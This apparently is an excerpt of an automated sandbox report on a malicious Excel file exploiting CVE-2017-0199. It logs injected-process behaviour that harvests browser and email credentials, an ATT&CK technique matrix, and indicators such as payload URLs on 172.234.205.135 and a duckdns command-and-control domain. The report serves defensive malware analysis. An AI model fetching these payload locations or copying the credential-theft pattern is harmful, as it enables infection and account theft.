                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,35_2_00450DDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,35_2_00450E6A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,30_2_0041881C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,31_2_004082CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,35_2_0044800F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0041739B GetVersionExW,30_2_0041739B
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data35_2_0040B21B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\35_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db35_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: ESMTPPassword 31_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 31_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 31_2_00402DB3
                  Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3120, type: MEMORYSTR

                  Remote Access Functionality

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-H42H13
                  Source: Yara match File source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: cmd.exe 35_2_00405042
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 121 Scripting | Valid Accounts | 11 Native API | 121 Scripting | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                  Credentials | Domains | Default Accounts | 23 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Bypass User Account Control | 21 Obfuscated Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
                  Email Addresses | DNS Server | Domain Accounts | 133 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 1 Install Root Certificate | 2 Credentials in Registry | 1 System Service Discovery | SMB/Windows Admin Shares | 21 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 1 Windows Service | 1 DLL Side-Loading | 3 Credentials In Files | 4 File and Directory Discovery | Distributed Component Object Model | 111 Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | 4 PowerShell | Network Logon Script | 321 Process Injection | 1 Bypass User Account Control | LSA Secrets | 39 System Information Discovery | SSH | 4 Clipboard Data | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 3 Security Software Discovery | VNC | GUI Input Capture | 213 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 321 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                  Behavior Graph: ID 1562330 | Sample: OC25-11-24.xls | Start date: 25/11/2024 | Architecture: WINDOWS | Score: 100

                  Source | Detection | Scanner | Label | Link
                  OC25-11-24.xls | 16% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199 |
                  OC25-11-24.xls | 100% | Joe Sandbox ML | |
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  provit.uk | 198.244.140.41 | true | false | | high
                  newbeggin.duckdns.org | 31.13.224.72 | true | true | | unknown
                  geoplugin.net | 178.237.33.50 | true | false | | high
                  ip.3105.filemail.com | 193.30.119.205 | true | true | | unknown
                  3105.filemail.com | unknown | unknown | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  newbeggin.duckdns.org | true | Avira URL Cloud: safe | unknown
                  https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout | false | Avira URL Cloud: safe | unknown
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta | true | Avira URL Cloud: safe | unknown
                  http://geoplugin.net/json.gp | false | | high
                  http://172.234.205.135/1244/SRVRSR.txt | true | Avira URL Cloud: safe | unknown
                  http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF | true | Avira URL Cloud: safe | unknown
                  https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c | true | Avira URL Cloud: safe | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvD598.tmp.30.drfalse
                                                                                              high
                                                                                              https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                                high
                                                                                                http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dllpowershell.exe, 00000012.00000002.490397083.000000001AD05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.nirsoft.net/CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.448423237.00000000022E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.512617659.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000020F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000022C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://172.234.205.135/o-5.mshta.exe, 00000010.00000002.479530310.00000000033A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvD598.tmp.30.drfalse
                                                                                                        high
                                                                                                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvD598.tmp.30.drfalse
                                                                                                          high
                                                                                                          http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvD598.tmp.30.drfalse
                                                                                                            high
                                                                                                            https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvD598.tmp.30.drfalse
                                                                                                              high
                                                                                                              http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvD598.tmp.30.drfalse
                                                                                                                high
                                                                                                                http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvD598.tmp.30.drfalse
                                                                                                                  high
                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta.NET4.0E)mshta.exe, 00000004.00000002.428662532.0000000000147000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428612562.0000000000147000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425003533.0000000000154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.ccleaner.com/go/app_cc_pro_trialkeybhvD598.tmp.30.drfalse
                                                                                                                      high
                                                                                                                      http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=qumshta.exe, 00000004.00000003.425003533.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://contextual.media.net/8/nrrV73987.jsbhvD598.tmp.30.drfalse
                                                                                                                          high
                                                                                                                          http://www.imvu.comCasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://contoso.com/Iconpowershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://provit.uk/.mshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta...mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://contextual.media.net/bhvD598.tmp.30.drfalse
                                                                                                                                high
                                                                                                                                http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvD598.tmp.30.drfalse
                                                                                                                                  high
                                                                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvD598.tmp.30.drfalse
                                                                                                                                    high
                                                                                                                                    http://www.msn.com/bhvD598.tmp.30.drfalse
                                                                                                                                      high
                                                                                                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvD598.tmp.30.drfalse
                                                                                                                                        high
                                                                                                                                        http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaemshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvD598.tmp.30.drfalse
                                                                                                                                            high
                                                                                                                                            http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFppowershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaomshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://3105.filemail.com/api/file/get?filppowershell.exe, 0000000F.00000002.512617659.00000000023F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000024C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htanmshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://172.234.205.135/1244/creapowershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dlli2hpowershell.exe, 00000005.00000002.453548568.000000001A907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://cdn.at.atwola.com/_media/uac/msn.htmlbhvD598.tmp.30.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                                                                high
                                                                                                                                                http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=quizzical&timmshta.exe, 00000004.00000002.428662532.00000000000FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.000000000040D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.000000000040E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaC:mshta.exe, 00000004.00000003.427140274.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429534936.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvD598.tmp.30.drfalse
                                                                                                                                                  high
